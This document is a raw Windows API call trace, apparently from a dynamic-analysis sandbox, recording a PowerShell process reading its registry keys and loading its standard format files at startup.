	[0335.773] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.773] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.774] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.774] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.775] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.776] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d588 | out: phkResult=0x14d588*=0x2e4) returned 0x0
	[0335.776] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x14d59c, lpData=0x0, lpcbData=0x14d598*=0x0 | out: lpType=0x14d59c*=0x1, lpData=0x0, lpcbData=0x14d598*=0x74) returned 0x0
	[0335.776] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x14d50c, lpData=0x0, lpcbData=0x14d508*=0x0 | out: lpType=0x14d50c*=0x1, lpData=0x0, lpcbData=0x14d508*=0x74) returned 0x0
	[0335.776] CoTaskMemAlloc (cb=0x78) returned 0x24a9c0
	[0335.776] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x14d4dc, lpData=0x24a9c0, lpcbData=0x14d4d8*=0x74 | out: lpType=0x14d4dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d4d8*=0x74) returned 0x0
	[0335.776] CoTaskMemFree (pv=0x24a9c0) 
	[0335.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0335.777] SetErrorMode (uMode=0x1) returned 0x1
	[0335.777] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0335.777] SetErrorMode (uMode=0x1) returned 0x1
	[0336.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.220] SetErrorMode (uMode=0x1) returned 0x1
	[0336.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0336.220] SetErrorMode (uMode=0x1) returned 0x1
	[0336.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.220] SetErrorMode (uMode=0x1) returned 0x1
	[0336.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0336.220] SetErrorMode (uMode=0x1) returned 0x1
	[0336.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.220] SetErrorMode (uMode=0x1) returned 0x1
	[0336.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0336.221] SetErrorMode (uMode=0x1) returned 0x1
	[0336.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.221] SetErrorMode (uMode=0x1) returned 0x1
	[0336.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0336.221] SetErrorMode (uMode=0x1) returned 0x1
	[0336.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0336.221] SetErrorMode (uMode=0x1) returned 0x1
	[0336.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0336.221] SetErrorMode (uMode=0x1) returned 0x1
	[0336.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0336.222] SetErrorMode (uMode=0x1) returned 0x1
	[0336.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0336.222] SetErrorMode (uMode=0x1) returned 0x1
	[0336.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0336.222] SetErrorMode (uMode=0x1) returned 0x1
	[0336.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0336.222] SetErrorMode (uMode=0x1) returned 0x1
	[0336.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0336.222] SetErrorMode (uMode=0x1) returned 0x1
	[0336.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0336.223] SetErrorMode (uMode=0x1) returned 0x1
	[0336.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0336.223] SetErrorMode (uMode=0x1) returned 0x1
	[0336.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d460 | out: lpFileInformation=0x14d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0336.223] SetErrorMode (uMode=0x1) returned 0x1
	[0336.223] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0336.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.223] CoTaskMemFree (pv=0x1f7c30) 
	[0336.226] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0336.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.227] CoTaskMemFree (pv=0x1f7c30) 
	[0336.227] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0336.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.227] CoTaskMemFree (pv=0x1f7c30) 
	[0336.228] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0336.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.228] CoTaskMemFree (pv=0x1f7c30) 
	[0336.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.228] SetErrorMode (uMode=0x1) returned 0x1
	[0336.228] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0336.228] GetFileType (hFile=0x32c) returned 0x1
	[0336.228] SetErrorMode (uMode=0x1) returned 0x1
	[0336.228] GetFileType (hFile=0x32c) returned 0x1
	[0336.229] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.230] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.230] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x9e2, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x3367d32, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3367d32*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.231] ReadFile (in: hFile=0x32c, lpBuffer=0x33687e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33687e8*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.232] CloseHandle (hObject=0x32c) returned 1
	[0336.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.232] SetErrorMode (uMode=0x1) returned 0x1
	[0336.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0336.232] SetErrorMode (uMode=0x1) returned 0x1
	[0336.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.232] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x32c) returned 0x0
	[0336.232] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0336.232] CoTaskMemAlloc (cb=0x5a) returned 0x2906a0
	[0336.233] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x2906a0, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0336.233] CoTaskMemFree (pv=0x2906a0) 
	[0336.233] RegCloseKey (hKey=0x32c) returned 0x0
	[0336.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.237] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x40b2f8a2, Data2=0x46e1, Data3=0x4e4a, Data4=([0]=0x9b, [1]=0xf9, [2]=0x63, [3]=0xc8, [4]=0x8b, [5]=0x39, [6]=0xa, [7]=0x2))) returned 0x0
	[0336.242] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x48b7d4c6, Data2=0xdc8c, Data3=0x46ae, Data4=([0]=0x8f, [1]=0x77, [2]=0x40, [3]=0x1c, [4]=0x17, [5]=0x12, [6]=0x3, [7]=0x78))) returned 0x0
	[0336.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.244] SetErrorMode (uMode=0x1) returned 0x1
	[0336.244] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0336.244] GetFileType (hFile=0x32c) returned 0x1
	[0336.244] SetErrorMode (uMode=0x1) returned 0x1
	[0336.245] GetFileType (hFile=0x32c) returned 0x1
	[0336.245] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.246] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.246] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.246] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.247] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.247] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0xfb2, lpOverlapped=0x0) returned 1
	[0336.247] ReadFile (in: hFile=0x32c, lpBuffer=0x3392a6a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3392a6a*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.248] ReadFile (in: hFile=0x32c, lpBuffer=0x3393350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3393350*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.248] CloseHandle (hObject=0x32c) returned 1
	[0336.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.248] SetErrorMode (uMode=0x1) returned 0x1
	[0336.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0336.248] SetErrorMode (uMode=0x1) returned 0x1
	[0336.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.248] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x32c) returned 0x0
	[0336.248] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
